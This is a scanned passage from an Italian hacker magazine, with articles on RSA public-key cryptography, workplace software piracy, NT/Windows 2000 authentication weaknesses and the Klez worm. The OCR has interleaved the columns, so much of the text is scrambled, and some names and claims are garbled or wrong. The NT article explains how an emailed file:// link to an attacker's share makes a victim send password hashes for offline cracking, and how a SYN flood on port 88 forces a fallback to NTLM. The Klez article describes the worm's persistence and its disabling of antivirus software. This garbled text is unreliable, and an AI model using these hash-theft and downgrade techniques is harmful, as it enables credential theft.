www.hackerjournal.it |19
CRITTOGRAFIA

I FONDAMENTI DELLA CRITTOGRAFIA MODERNA

LA CRITTOGRAFIA
A DOPPIA CHIAVE
No, non ci stiamo riferendo alla “doppia mandata” con cui
si chiude la porta di casa per stare sicuri, ma
all’algoritmo matematico che negli anni Settanta ha
rivoluzionato la scienza della cifratura dei messaggi.

S ullo scorso numero ab-


biamo parlato degli al-
bori della cittografia e
dei metodi che si sono affermati fino
ro prodotto ma dato il loro prodotto
è quasi impossibile risalire ai nume-
ri primi originari, specialmente se i
numeri primi sono molto grandi.
Questo accade perché non esiste
alcuna regola per scomporre in
fattori un numero dato e biso-
qualcuno si metta all’opera occorre
considerare che negli anni 90, per
decodificare senza la chiave un
messaggio con chiave di 128 bit,
vennero impiegati più di 1600
computer per 8 mesi di tempo.

ai primi decenni dopo la seconda gna procedere per approssima- Attualmente i programmi per la ci-
guerra mondiale. Nel 1976 venne zioni e tentativi. Prima che fratura asimmetrica utilizzano
pubblicato uno studio intitolato chiavi che superano i 2048 bit.
“New Directions in Crypto- In questo contesto la chiave pri-
graphy ”. Gli autori erano Whit- vata di un sistema asimmetrico
field Diffide e Martin Hellman e contiene i numeri già scomposti
ipotizzavano un sistema che mentre quella pubblica ne con-
permettesse di avere due tiene il prodotto. È quindi im-
chiavi: una pubblica per ci- possibile risalire a una chiave
frare i messaggi e una pri- privata partendo da quella
vata per decifrarli. Queste pubblica.
due chiavi dovevano essere fatte Il problema reale di questo ti-
in modo da impedire di rico- po di cifratura è piuttosto che,
struirne una pur conoscendo l’al- anche con la chiave, l’opera-
tra. L’anno seguente tre ricerca- zione di codifica e decodifica
tori del MIT riuscirono a identifi- è estremamente lenta: fino a
care un algoritmo applicabile a 1000 volte più lenta di un si-
questa teoria. Si chiamavano Ro- stema tradizionale. Per ri-
nald Rivest, Adi Shamir e Len Ad- solvere il problema sono
leman e battezzarono l’algoritmo nati i sistemi misti che
RSA, ancora oggi usato in diverse P non forn isce alcuno mescolano i vantaggi dei
n PG
testo cifrato co sigla PGP ini-
varianti con un grado di sicurezza L’apertura di un lisi se non la presenza della re servono metodi tradizionali con
na ne
pressoché assoluto. spunto per un’a r operare su un testo del ge i computer quelli dei sistemi a chia-
Tutto si basa su alcuni concetti ma- In re altà pe a serie di po tent ve asimmetrica.
ziale. sto complessi, un che il sistema di codifica Prendiamo ad esempio un
tematici a dire la verità piuttosto ram m i piutto
prog visto
se di pazienza a una singo- messaggio che deve essere
semplici. Dati due numeri primi, è e una buona do ere decine di anni per risalire
ed
un’operazione banale stabilire il lo- di PGP può richi trasferito da A a B. Con un
la chia ve.

20| www.hackerjournal.it
>>

L’algoritmo RSA
La soluzione è stata
quella di mescolare i Si tratta di una funzione particolare detta “non
due metodi. A codifica invertibile” perché dal suo risultato non è pos-
il messaggio usando sibile risalire ai valori di ingresso. Un po’ come
un sistema tradiziona- se mescolassimo gli ingredienti di una torta.
le come IDEA e con Sarebbe alquanto difficile riuscire, partendo
una chiave completa- dalla torta, a dividere gli ingredienti originari
mente casuale, gene- tra loro.
rata in automatico. In pratica si scelgono due numeri con qualche
Poi la chiave viene centinaio di cifre decimali (scelti a caso) che
codificata con la siano primi. Per farlo si utilizza il test di Fermat.
chiave pubblica di B, Poi si determina il prodotto dei due numeri e il
in modo da renderla prodotto dei due numeri pari immediatamen-
illeggibile. Il tutto te inferiori. Se A e B sono i due numeri si avrà
viene inviato a B f1=A*B e f2=(A-1)*(B-1). Poi bisogna sceglie-
che per leggere il re un valore C che sia primo rispetto al risulta-
messaggio dovrà to di f2. C non deve cioè avere fattori primi in
decodificare la comune con f2. Per finire si trova un numero,
chiave temporanea chiamiamolo D, che moltiplicato per C e diviso
tramite la sua per il risultato di f2 dia come resto della divi-
chiave privata e sione 1. Facendo un esempio con numeri pic-
poi potrà decodifi- coli avremo:
care il messaggio A=7 e B=5
vero e proprio f1=35 e f2=24
tempo , sp ec ia l- usando la chiave 24 può essere scomposto come 3*2*2*2 quin-
rza bruta richiede parecchio nere di decodi- appena ricostrui- di occorre trovare un numero che non abbia
La decodifica tra
mite fo e se questo ge ò ta.
pa rte di singo le persone. Anchsistemi di crittografia forte pu questi come divisori. Poniamo C=7.
mente da e no n ha nno gannar e pe rc hé Oggi il pro- Per questo il resto dell’operazione (D*7)/24
su dei file ch i però in
fica viene fatta o impegnativa. Non lasciamocavanti da governi capaci gramma di deve essere uguale a 1. Possiamo porre D=7
risultare piuttost ni vengono in genere portate secondo e non solo il mi- c r i t t o g r a f i a (7*7/24=2 con resto di 1).
io al
queste operaz cine di milioni di password computer. più usato al La cifratura avviene dividendo il testo in blocchi
di “provare” deord al secondo di un normale mondo è PGP, di lunghezza non standard perché la lunghezza
gliaio di pass w
creato dall’americano Phil dei blocchi corrisponde al più grande intero X
sistema tradizionale Zimmermann, che usa il siste- che soddisfa l’equazione 2^X<f1. Nel nostro
il messaggio viene codificato con ma misto per la codifica dei esempio 2^5= 32, quindi il testo verrà diviso
una certa chiave e trasferito da A a messaggi. Il sistema è talmente si- in blocchi da 5 bit.
B ma la chiave deve essere già in curo che Zimmermann è stato messo Ogni blocco Z viene poi cifrato calcolando il
possesso di B oppure deve essergli sotto accusa dagli USA per aver vio- resto della divisione Z^D/f1. La decifrazione
stata comunicata usando un canale lato la sicurezza nazionale, diffon- di un blocco, Zc, avviene invece calcolando il
diverso da quello usato per inviare il dendo un sistema di cifratura che resto della divisione Zc^C/f1.
messaggio (e qui c’è un primo grave non può essere controllato dal go- È quindi chiaro che nella chiave pubblica è in-
rischio: se la chiave viene intercetta- verno degli USA. È stato scagionato serito sia il valore di D che quello di f1 ma è
ta, tutto il sistema di crittografia dopo due anni e mezzo di dura bat- anche chiaro che per risalire al valore di C, in-
crolla miseramente). Con una codi- taglia e attualmente non si conosce dispensabile per la decodifica, occorre un cer-
fica a chiave asimmetrica, invece, A nessuno che sia riuscito a decodifi- to lavoro. In modo specifico il lavoro necessa-
può codificar eil messaggio usando care i messaggi crittografati usando rio è quello di trovare i numeri A e B cono-
la chiave pubblica di B e B lo deco- PGP. La domanda che pizzica tanti scendone solo il prodotto. Il nome del proble-
dificherà con la sua chiave privata. paladini della privacy è: “non si co- ma è “fattoralizzazione dei numeri primi” e
Il problema è che B impiegherà mol- nosce nessuno perché nessuno l’ha non esiste attualmente alcuno strumento mate-
to tempo per ricostruire tutto il mes- decifrata, o perché chi l’ha decifrata matico diretto per risolverlo con numero di una
saggio perché l’uso del sistema non ha alcun interesse a dirlo”? K certa grandezza.
asimmetrico richiede più tempo. Con le chiavi attualmente utilizzate, a 2048 bit,
KHAMUL il tempo necessario per sfondare questo siste-
ma di protezione può arrivare a qualche centi-
naio di anni.

www.hackerjournal.it |21
privacy

GUIDA ALLA GESTIONE DELLE LICENZE SOFTWARE IN UFFICIO

SOFTWARE
PIRATA IN AZIENDA
Come un sistemista di rete può tutelare l’azienda e il suo posto di lavoro contro
l’utilizzo di software illegale da parte dei dipendenti.

Questo articolo nasce da una


lettera spedita da Fievel82,
che chiedeva appunto come
potersi tutelare contro i
colleghi che installano
software pirata sui computer
aziendali. Noi abbiamo a china invii a un server in rete un OS X e Linux.
nostra volta girato a Enzo elenco di tutti i programmi, i font Se la rete e le macchine sono molte, nasco-
Borri, consulente antipirateria e quant’altro interessi tenere sot- no però dei problemi: nell’arco di pochi
to controllo. Vi sarà poi un ulteriore giorni tutti conoscerebbero la password
per aziende e per le Forze programma sul server che analizzerà dell’amministratore. Chi opera in grosse
dell’Ordine. questi file al fine di rilevare discrepanze aziende sa benissimo che per comodità vi è
con quanto installato dall’amministra- una unica password usata dall’amministra-

I
tore di rete. tore di sistema per accedere a qualsiasi
Sebbene possa funzionare, è uno scenario macchina. È proprio l’amministratore che a
confuso in cui l’amministratore di sistema volte, stanco di correre da un ufficio all’altro
l problema dell’utilizzo di soft- dovrebbe sempre esaminare giorno per per installare una volta un aggiornamento,
ware illegale in un’azienda va giorno se sono state rilevate irregolarità. una volta WinZip o qualcos’altro, prima o
affrontato su due fronti: uno Inoltre, basterebbe decisamente una poi rivela la password a uno degli
quello tecnico e uno quello le- conoscenza minima del sistema per utenti per fare sì che questi si arran-
gale. disabilitare questo tipo di controllo. gi da solo togliendogli una scocciatura.
Parlando dell’aspetto tecnico, vi sono diver- Una soluzione più efficace, consiste nel li- Quest’utente, è tipicamente lo smanetto-
se tipologie d’approccio. mitare le possibilità dell’utente. Se il sistema ne dell’azienda che comincerà a da-
Una soluzione macchinosa ma utile nei ca- operativo ha capacità di affidare il control- re la password di amministratore a
si in cui è necessario lasciare ampio spazio lo totale della macchina a un amministrato- desra e a manca.
agli utenti, consiste nel creare un program- re, si può autorizzare solo questo a installa-
mino usando uno degli strumenti di base re software e si possono autorizzare invece
del sistema operativo – un .bat in DOS da tutti gli utenti al semplice utilizzo. >> Un sistema centrale
usarsi su Windows piuttosto che un Apple- Questa strada è valida per diversi sistemi
Script su Mac per fare degli esempi – che a operativi Windows, per Mac OS e per i si- La soluzione che ora sta iniziando a pren-
ogni avvio o spegnimento della mac- stemi multiutente come Windows XP, Mac dere piede – e che appare la migliore e la

22| www.hackerjournal.it
>>

più semplice da gestire – consiste nell’usare ratori”. Le sanzioni, sono le medesime che di onnipotenza che spesso affligge i
uno o più server su cui sarà installato sia il per il software illecitamente duplicato. sysadmin, dimentica queste regole e
sistema operativo che i programmi che ver- Si rende quindi necessario limitare l’ac- si mette a “spiare” i propri colleghi
ranno usati dai vari utenti. Questo metodo cesso a Internet lasciando aperte so- (qualche volta persino per espressa indica-
– sebbene richieda delle reti dimensionate lo le porte necessarie alle attività uti- zione della direzione). È bene che si sappia
e ben studiate in funzione del traffico – si ri- li all’azienda (es consultare siti, prelevare che queste attività non possono essere pra-
vela essere anche più economico di altri in posta elettronica, accedere a database su ticate senza aver fatto prima un accordo
quanto consente l’acquisto di licenze “a server di altre sedi eccetera) chiudendo le con le rappresentanze sindacali e informa-
utente” piuttosto che “a postazione”. Que- porte tipicamente usate per FTP o da pro- to tutto il personale sottoposto ai controlli.
ste consentono infatti l’uso di un program- grammi tipo HotLine, Carracho e simili.
ma a un certo massimo di utenti. Raggiun- Questa, può anche essere un’occasione per
to tale numero di utenti, chi vorrà usare chiudere anche le porte usate da program- >> Conclusioni
quel programma dovrà attendere che uno mi tipo Napster per lo scambio di MP3.
degli utilizzatori lo chiuda. Se ci si pensa be- Sebbene infatti questa attività potrebbe non
ne, non tutti gli utenti usano contempora- essere illecita, sicuramente il tempo perso e Viste le varie soluzioni possibili, la super-so-
neamente tutti i programmi che hanno in- il traffico generato sulla rete sono sempre luzione può essere quella di fornire a tutti i
stallato o cui hanno accesso. Va comunque un danno — o almeno un fastidio — per dipendenti informazioni sulle leggi e sulle
prestata attenzione alla licenza d’uso: molti l’azienda. politiche aziendali attuate in propria tutela e
prodotti software infatti hanno clausole che informare i dipendenti sull’esistenza di file
dicono che occorre una licenza per ogni di log che consentono l’identificazione del
utente che può utilizzare quel programma e >> L’aspetto legale nome utente utilizzato all’atto dell’installa-
non per il numero massimo di utenti con- zione di componenti software o dell’indiriz-
temporanei! zo IP utilizzato per attività su Internet. For-
Tra i limiti di questa soluzione, vi può anche Esaminando poi l’aspetto legale del proble- nendo poi a ciascun utente una propria lo-
essere il fatto della difficoltà nel personaliz- ma, occorre dire che i reati di cui si è parla- gin e password personali per accedere al
zare il sistema operativo con driver specifici to, sono reati penali! Ciò significa che per proprio elaboratore il quale avrà un suo in-
in funzione di particolari Hardware diversi questi non può essere impuatata una dirizzo IP assegnato dall’amministratore.
tra le varie macchine in rete. figura giuridica quale un’azienda Oltre a tutelare l’azienda evitando compor-
Una delle soluzioni più belle del “Net-Boot” bensì una persona fisica. Trattandosi di tamenti scorretti o potendo identificare
è quella di Apple. Quando varie macchine persona fisica, se come responsabile viene eventuali responsabili, si tutelerà anche il
– anche di modello diverso – sono collega- identificato un dipendente, sarà questo a dipendente evitando che qualcun’altro
te a un server con il sistema operativo – essere denunciato oppure – nel caso venis- compia operazioni “strane” a sua insaputa.
Mac OS – usato dai client, ciascuno di que- se denunciato il responsabile legale dell’a- Di solito infatti… è sempre colpa di qualcu-
sti può accedere a un suo set di driver zienda – quest’ultimo potrà rivalersi in sede n’altro! In ultimo, secondo la Legge in tute-
(estensioni, pannelli di controllo, librerie ti- civile nei confronti del dipendente chieden- la della Privacy, va detto che l’utilizzo di una
po DLL eccetera) specifico per il suo hard- do un risarcimento per il danno subìto. Va password onde consentire l’accesso agli
ware e per i programmi cui ha accesso. Da anche detto che, secondo lo statuto del la- elaboratori solo da parte del personale au-
un unico pannello di controllo è possibile – voratore, vi sono gli estremi per cui il di- torizzato, rientra tra i requisiti minimi da at-
in un paio di minuti al massimo – stabilire pendente potrebbe anche essere li- tuarsi qualora sugli elaboratori vengano ef-
quali elementi attivare e creare dei set già cenziato a causa di questo suo com- fettuati dei trattamenti di dati personali. K
pronti da utilizzare per più utenti. portamento illecito.
Una buona educazione in ambito azienda- ENZO BORRI
le sui rischi nel caso si installi illecitamente enzo@borri.org
>> Non solo software del software è innanzitutto doverosa, ed è
un ottimo deterrente per evitare gran parte
dei possibili comportamenti scorretti.
Tutte le soluzioni esaminate finora, non Ma anche gli amministratori devono sotto- Link utili
impediscono la presenza di crack, di stare a certe regole, e non possono met-
raccolte di numeri di serie o di pro- tersi a sorvegliare indiscriminata- www.privacy.it
grammi sotto forma di installer che mente le attività dei colleghi. Lo statu- Informazioni varie legate al tema del-
qualcuno potrebbe prelevare da Internet. to dei lavoratori vieta espressamente l’in- la privacy
Va infatti detto che anche i programmi sot- stallazione sul posto di lavoro di strumenti
to forma di installer necessitano di licenza e di controllo remoto (art. 4), quali telecame- www.garanteprivacy.it
che i crack e le raccolte di numeri di serie re e microfoni e –per estensione– anche Sito del Garante per la protezione dei
sono da considerarsi illeciti in quanto rien- strumenti di logging delle attività Internet o dati personali
trano tra i “mezzi intesi unicamente a con- di monitoraggio del lavoro svolto al com-
sentire o facilitare la rimozione arbitraria o puter (keylogger, strumenti per la cattura re- www.lomb.cgil.it/leggi/
l’elusione funzionale di dispositivi applicati mota dello schermo). A volte, qualche legge300.htm
a protezione di un programma per elabo- amministratore colto dalla sindrome Lo statuto dei lavoratori

www.hackerjournal.it |23
Sicurezza

AUTENTICAZIONE
DEI

SISTEMI NT
Secondo qualcuno, “sicurezza di Windows” è un ossimoro come
“intelligence militare”, ma se si fanno le cose per bene, un sistema
Windows 2000 potrebbe persino essere protetto in modo robusto
COME FUNZIONA LA SICUREZZA DEI SISTEMI WINDOWS

N
leggiate questo paragrafo dando Service).
anche un’occhiata alla figura con lo Trovato il dominio HJ, il Netlogon di Caio
egli ultimi anni ed in particola- schema di autenticazione in queste invia l’hash con le credenziali di logon al
re con l’uscita dei sistemi ope- pagine. PDC (Primary Domain Controller) di HJ at-
rativi Win2000pro, Immaginiamo che l’utente Caio voglia col- traverso una RPC (Remote Procedure Call).
Win2000Server, Microsoft sem- legarsi al dominio HJ; inserisce il nome Il servizio di Netlogon del PDC di HJ riceve
bra aver finalmente cambiato politica nei utente, la password e il dominio nell’appo- quindi l’hash da Caio e (invece di fumarse-
confronti del problema sicurezza. Da un sita maschera di winlogon; a questo punto lo;-)) lo passa al livello inferiore del suo
lato si è avuta una parziale rinuncia alla entra in gioco l’LSA (Local Security Autho- MSV1_0, che a sua volta interroga il Secu-
semplicità d’utilizzo (è un po’ più difficile rity, è il processo lsass.exe nel Task Mana- rity Account Manager(SAM). Quest’ultimo
configurare un sistema Win2000Server ger) che richiama il pacchetto di autentica- confronta l’hash rice-
che un sistema NTServer) ottenendo in zione MSV1_0 contenuto nella libreria
cambio un miglioramento consistente del- msv1_0.dll nella car-
la sicurezza. Vediamo, in particolare co- tella winnt/system32.
m’è cambiata la procedura d’auten- Questo pacchetto è
ticazione degli utenti tra Windows costituito da due livel-
NT e Windows 2000, che vulnerabilità li: un livello superiore,
questi cambiamenti andavano a corregge- che viene eseguito nel
re e quali problemi ancora rimangono. computer locale (quel-
lo di Caio), che cripta
la password e verifica
>> Il giro del fumo se l’autenticazione è in
locale, se non lo è,
I sistemi Windows NT prevedono tre tipolo- passa l’hash (così si
ws NT.
gie d’autenticazione: locale (Local Logon), chiama la stringa otte- ic az io ne di rete di Windo
aute nt
in un dominio (Domain Logon), verso un nuta dopo la cifratura) procedura di
Lo schema della
dominio che ha una relazione di fiducia al servizio Netlogon di vuto con quello all’inter-
(trust relationship) con un altro dominio Caio, che si occupa di no del suo database e, in caso di esito po-
(Trust Domain Logon). Per semplificare trovare il dominio HJ (in genere ciò avvie- sitivo, crea un Security Identifier (SID) che
l’argomento descriveremo soltanto il Do- ne o attraverso messaggi di broadcast via racchiude in sé le credenziali dell’utente
main Logon. Ora, “semplificare” forse è NetBIOS, che vengono inviati all’avvio del Caio. Il SID viene inviato di nuovo al livello
una parola grossa; le procedure sono sistema o attraverso il file lmhosts o attra- inferiore dell’MSV1_0, da qui al Netlogon
piuttosto complicate, e conviene che verso il WINS (Windows Internet Name che lo ripassa al Netlogon di Caio con una

24| www.hackerjournal.it
>>
RPC e, attraverso il livello superiore del- mevostrocomputer/cartellacondivisa/ciao.t Win2000, renderebbe quindi molto
l’MSV1_0 di Caio, arriva all’LSA di Caio. xt , basta che qualcuno faccia clic sul difficile se non impossibile l’intercet-
Quest’ultimo effettua lo step finale della link per fare in modo che il suo com- tazione delle password, se non fosse
connessione, costituito dalla creazione del puter tenti una connessione con la per un piccolo difetto: la necessità di
token di accesso per il processo di Caio. macchina dell’attaccante, e gli invii compatibilità con i sistemi precedenti (Win-
Questo contiene due SID, uno in cui sono gli hash delle password che lui snif- dows NT & C.) ha indotto Microsoft a man-
contenute le credenziali che Caio ha nel ferà con L0phtcrack. Pensate cosa po- tenere il mitico NTLM che entra in azione
dominio HJ e l’altro in cui sono contenute trebbe significare per qualcuno riuscire ad nel momento in cui Kerberos non è dispo-
le credenziali che l’utente Caio ha nel com- avere la password del proprio capo ufficio! nibile. Se quindi qualcuno volesse in-
puter locale. Dopo quest’ultimo passaggio tercettare gli hash alla vecchia ma-
ad ogni richiesta di accesso a risorse del niera, dovrebbe fare in modo che
dominio HJ verrà attaccato il token appena
>> Su Windows 2000 Kerberos non entri in azione nel PDC
generato. del dominio vittima. Questo per esem-
Per far fronte a queste vulnerabilità, in Win- pio potrebbe essere provocato da un attac-
dows 2000 sono state effettuate alcune co SYN flooding sulla porta TCP 88, che
>> Punti deboli modifiche rilevanti alla procedura d’auten- rende il servizio non più disponibile. Per
ticazione: l’utilizzo del protocollo Ker- questo conviene dis-
La principale vulnerabilità di questa proce- beros è probabilmente la più im-
dura è il sistema NT Lan Manager, con cui portante. Questo proto-
vengono criptate le password e generati gli collo è stato sviluppato al
hash nelle comunicazione con i sistemi “in- MIT nell’ambito del pro-
feriori” (Win95/98/Me). La debolezza con- getto Athena, ed è uno
siste nel fatto che le passwordm prima di standard aperto. Il sistema
essere criptate, vengono divise in due bloc- d’autenticazione del Ker-
chi da 7 caratteri per un massimo di 14 ca- beros è basato su crittogra-
ratteri per password; ciò permette a pro- fia a chiave simmetrica,
grammi come L0phtcrack (www.lopht.com) cioè la stessa chiave può ci-
di decrittare la password attaccando un frare e decifrare i dati.
singolo blocco che, nel caso sia costitui- Nel momento in cui un uten-
to da 7 caratteri di tipo alfanumerico te si connette a un PDC Win-
viene scoperto in un massimo di 24 dows 2000, quest’ultimo,
ore. Considerate inoltre che questa opera- dopo aver verificato nome policies
nf ig ur az io ne delle Kerberos
zione può essere eseguita offline, cioè sen- utente e password, genera Finestra di co
za rischio, avendo però o il file del SAM o una chiave di sessione e la in- attivare l'NTLM, in modo
sniffando gli hash durante una comunica- via al client all’interno di un pacchetto de- che l’autenticazione possa avvenire
zione client-server. Entrambe queste ope- nominato TGT (ticket-granting ticket). Da soltanto sfruttando Kerberos, o altri-
razioni però non sono semplicissime da questo momento in poi e per tutta la dura- menti venga impedita. Per fare ciò, si
realizzare, a meno che l’amministratore di ta della chiave di sessione, il client utilizze- possono chiudere con un firewall le porte
sistema non sia un idiota. Altro difetto, non rà soltanto quest’ultima per la cifratura 139 e 445, che servono a gestire le con-
secondario, è il continuo invio degli delle comunicazioni con altri sistemi Kerbe- nessioni NetBIOS/SMB che utilizzano
hash delle password, che viene ripe- ros del dominio, e quindi non dovrà più NTLM. Il modo più corretto però è quello di
tuto ogni volta che si cerca di accede- utilizzare la sua password né criptata in un seguire questa semplice procedura:
re a una risorsa. In questo modo è più hash, né naturalmente in chiaro. Se il client Si va su Start - Impostazioni - Rete e con-
probabile che qualcuno riesca vuole accedere a una risorsa del dominio, nessioni remote. A questo punto, tra i menù
invia la sua TGT al servizio KDC (Key Dis- della finestra scegliere "Avanzate" e cliccare
tribution Center — Centro di Distri- sulla voce "Impostazioni Avanzate". Vi tro-
buzione di Chiavi) del PDC vate davanti una finestra in cui nella parte
Win2000; quest’ultimo, vedendo che superiore si può scegliere la connessione di
l’utente è in possesso di un TGT vali- rete desiderata. A ogni connesione di rete
do ed è quindi già stato autenticato, corrisponde una scheda montata sul server
gli restituisce un resource o service tic- (in genere ce ne sono due, una per la rete
ket, che il client invierà poi alla risorsa interna ed una per Internet). Selezionate
o al servizio al quale vuole accedere. quella collegata ad Internet e, nella parte
Questo accade per esempio quando inferiore della finestra, deselezionate la
un utente voglia accedere ad una car- "Condivisione file e stampanti per reti Mi-
tella condivisa che non si trova sul PDC, crosoft". Questa impostazione non chiude
ma su un altro server non-PDC del do- del tutto le porte 139 e 445 ma fa sì che
Esempio di rich minio. Le impostazioni sulla durata del- non rispondano alle richeste di connessio-
iesta elenco TG
T di Kerberos le chiavi sono impostabili sulla console ne. In questo modo il sistema accetta solo
dell’Active Directory di Win2000 (vedi fi- connessioni su protocollo Kerberos.
a intercettarla. Basti pensare che, se gura).
si riesce ad inviare via email al computer Il sistema Kerberos, che attualmente è il ROBERTO "DEC0DER" ENEA
vittima un link di questo tipo: file:////no- protocollo d’autenticazione di default di

www.hackerjournal.it |25
virus
UN TROJAN ORMAI SUPERATO MA ANCORA IN CIRCOLAZIONE

La diffusione di worm e virus segnala all'u- Attualmente al vertice dei Top Threats ci sono dei virus per annientare la sua minaccia.
tente ancora una volta la necessità non so- Klez, Badtrans, Nimda, Sircam e Hybris: alcu- In questo numero ci occupiamo in particolare
lo di avere un software antivirus installato ni di questi meritano maggiore attenzione e li del primo worm dei Top Threats, Klez, scoper-
sul proprio computer ma anche di tenerlo analizzeremo in dettaglio in questo articolo e to il 17 Aprile 2002, mentre nel prossimo nu-
costantemente aggiornato per evitare brut- nei prossimi, mentre gli altri li vediamo qui di mero parleremo del Nimda. Il worm princi-
te sorprese. Come per i Top Wanted, i mag- seguito sommariamente: pale è W32.Klez.gen ma esistono altre due
giori ricercati dalle autorità negli USA, an- Badtrans - Scoperto alla fine del 2001, la sua varianti messe in circolazione da un po’ di
che sul Web sono state stilate delle classifi- caratteristica è quella di arrivare via email con tempo che sono W32.Klez.E@mm e
che per individuare quei un allegato delle dimensioni di 29.020 byte, W32.Klez.H@mm. Questo worm sta circo-
virus o quei worm il cui nome è casuale. Anche il soggetto del- lando ancora molto in Italia: arriva via email
maggiormente diffusi l'email può essere sempre diverso ma sembra con indirizzo del mittente e soggetto casuali
sulla rete, software che la diffusione di questo worm stia diven- con un allegato di circa 60 KB.
malevoli ed aggressivi tando sempre più limitata e non ritengo quin-
che spesso riescono a di che ci sia bisogno di approfondimenti. Azioni compiute
mantenere una eleva- Sircam – Stesso discorso vale per Sircam che,
tissima diffusione sui scoperto il 17 luglio 2001, sta scomparendo Klez è capace di infettare tutte le versioni di
sistemi Windows an- dalla circolazione. Questo worm è infatti ab- Windows mentre sono immuni all’infezione
che molti mesi dopo la bastanza semplice da individuare: arriva via Macintosh, Unix, Linux. Il worm è pericoloso e
loro comparsa. Alcuni email con un allegato di almeno 134 KB e il capace di provocare danni sul PC vittima ma
di questi virus si rendo- testo del messaggio che lo contiene presenta per rimuovere l’infezione la Symantec ha
no inoffensivi se sono nella prima riga la frase 'Hi! How are you?' e prontamente realizzato un programma gra-
state installate le patch nell'ultima riga la frase 'See you later. Thanks' tuito che potete scaricare all’indirizzo seguen-
per le vulnerabilità sfrut- (anche in spagnolo: 'Hola como estas?' e 'Nos te: http://securityresponse.symantec.com/av-
tate, altri hanno bisogno vemos pronto, gracias.'). Anche questo non center/venc/data/w32.klez.removal.tool.html
di un programma Antivi- credo che abbia bisogno di analisi approfon-
rus per evitare che infettino il computer. Nel- dite perché basta un buon AntiVirus per indi- Modalità di contagio
la classifica dei Top Virus Threats stilata dal viduarlo e annientarlo.
Symantec Security Response sono inseriti Hybris - Attivo dal 25 settembre 2000, Hybris Per diffondere la sua infezione, questo worm
solo quei virus o quei worm che hanno arriva sempre tramite email contenuto in un usa spesso una tecnica chiamata “spoofing”.
raggiunto un livello di attenzione pari a '4'. allegato con estensione .EXE o .SCR. Alcune Quando esegue la sua routine di invio delle
Si tratta di una soglia che segnala un'am- varianti di questo worm disegnano una spira- email, potrebbe usare un indirizzo scelto a
pia diffusione del worm e dunque una pro- le sul monitor del computer infetto, altre va- caso tra quelli trovati sul computer infetto co-
babilità elevata di riceverlo; per questo ve rianti possono infettare numerosi file ma vie- me indirizzo del mittente. Per esempio, Alfon-
ne parliamo per mettervi in guardia e ne riconosciuto dalla maggior parte degli an- so usa un PC infetto da Klez e non usa un An-
istruirvi su come evitare o rimuovere que- tivirus perché è abbastanza vecchio e non c’è tiVirus aggiornato. Quando Klez cerca di dif-
ste “infezioni”. bisogno dell’ultima versione delle definizioni fondersi inviando l’infezione ad altri trova, tra

26 | www.hackerjournal.it
tutti gli indirizzi email individuati, quello di - Un archivio .rar che ha un’estensione dop-
Matteo. Il worm allora inserisce nel campo Soggetto: W32.Klez removal tools pia come nomefile.txt.rar
del mittente l’indirizzo di Nicola, anch’esso Allegati: Install.exe
trovato sul PC infetto, e lo invia a Matteo. Messaggio: Dettagli tecnici
Quando Matteo, che ha un antivirus aggior- “W32.Klez is a dangerous virus
nato, scoprirà l’infezione nell'email ricevuta that spread through email. - Quando il worm viene eseguito si copia in
da Nicola, la segnalerà a quest’ultimo che Symantec give you the W32.Klez \System\<nome casuale>.exe.
pur eseguendo la scansione sul proprio PC removal tools For more informa- NOTA: “System” è variabile. Il Worm localizza
non troverà alcuna infezione. Questo è un tion,please visit http:/ la cartella di sistema di Windows (di default
modo per rendere più difficile la localizzazio- /www.Symantec.com” questa è C:\Windows\System o
ne del PC infetto da cui è partita l’infezione. È bene ricordare che Symantec, non invia mai C:\Winnt\System32) e copia se stesso in
Se si sta usando un buon antivirus, come il email simili, che vanno ritenute sempre false. questa directory.
Norton, e le definizioni dei virus sono aggior- - Aggiunge un valore dal nome casuale e un
nate, si può stare tranquilli, perché l’antivirus altro e System\Wink<nome
provvederà subito a rilevare l’infezione nell’e- Operazioni compiute casuale>.exe alla chiave di regi-
mail ed eliminarla. Questo worm inserisce il virus W32.El- stro HKEY_LOCAL_MACHINE\Softwa-
Solitamente Klez arriva tramite un’email di un kern.4926 come un file dal nome casuale re\Microsoft\Windows\CurrentVer-
mittente casuale e un testo e oggetto variabi- nella cartella Program Files del PC contagiato sion\Run oppure crea la chiave di registro
li. Nelle sue recenti varianti però, come e lo esegue (il nome della cartella può varia- HKEY_LOCAL_MACHINE\System\Cur-
W32.Lez.H@mm, l’infezione potrebbe arri- re a seconda del sistema operativo). rentControlSet\Services\<nome
vare anche in una finta email della Symantec Per continuare il suo contagio, Klez cerca la casuale> e inserisce un valore nella sotto-
simile alla seguente: rubrica di Windows, il database di ICQ e nei chiave in modo da far eseguire il worm all'av-
file locali del PC infetto per scovare indirizzi vio di Windows.
Come Klez incolpa email, a cui invierà poi l’infezione. L’oggetto, - Il worm disabilita, durante le scansioni, il ri-
il testo e il nome dell’email è variabile, e an- levamento della sua infezione e di quella di
le persone sbagliate che l’indirizzo del mittente è scelto casual- alcuni worm come Nimda e CodeRed, ri-
mente fra gli indirizzi trovati sul computer in- muovendo le chiavi di avvio del registro usate
Klez è difficile da individuare, perché il fetto. In aggiunta all’infezione, il worm po- dagli antivirus e fermando i processi attivi.
messaggio infetto non arriva mai dalla trebbe anche allegare un file a caso dal com-
persona che appare nel messaggio. puter di partenza. Questo accade per i file Come difendersi
Ecco come fa: con estensione mp8, txt, htm, html, wab, asp,
doc, rtf, xls, jpg, cpp, pas, mpg, mpeg, bak, Buona norma è comunque quella di non

1 Klez arriva sul PC di Tizio, che non


ha un antivirus in grado di rilevarlo
mp3 e pdf, che potrebbero essere allegati al-
le email con l'infezione. Come risultato l’e-
mail potrebbe avere due allegati, il primo do-
aprire o effettuare l’anteprima di messaggi
email che hanno un soggetto insolito e alle-
gati, anche se si conosce il mittente; nel dub-

2 Legge il contenuto della sua rubri-


ca, e ci trova gli indirizzi email di
Caio e Sempronio
vrebbe essere il worm mentre il secondo il file
selezionato a caso.
Klez infetta i file eseguibili creando una copia
bio conviene chiedere una conferma al mit-
tente. Per scoprire se si il computer è infettato
da qualche virus e non si possiede un softwa-
nascosta del file originale e poi sovrascriven- re Antivirus, è sempre possibile utilizzare il

3 Klez spedisce un'email a Sempronio


dal computer di Tizio, ma usando
come mittente del messaggio l'indirizzo
do il file originale con se stesso. La copia na-
scosta è decifrata ma non contiene dati infet-
ti. Il nome del file nascosto è lo stesso dell'ori-
servizio gratuito 'Security Check' che effettua
una scansione online del sistema ed e' acces-
sibile a partire dalla HomePage del Symantec
di Sempronio ginale, ma con un altra estensione. Security Response (SSR), al seguente indirizzo:
Inoltre il worm copia se stesso nel PC infetto http://securityresponse.

4 Sempronio riceve il virus e, se si ac-


corge dell'infezione, darà la colpa a
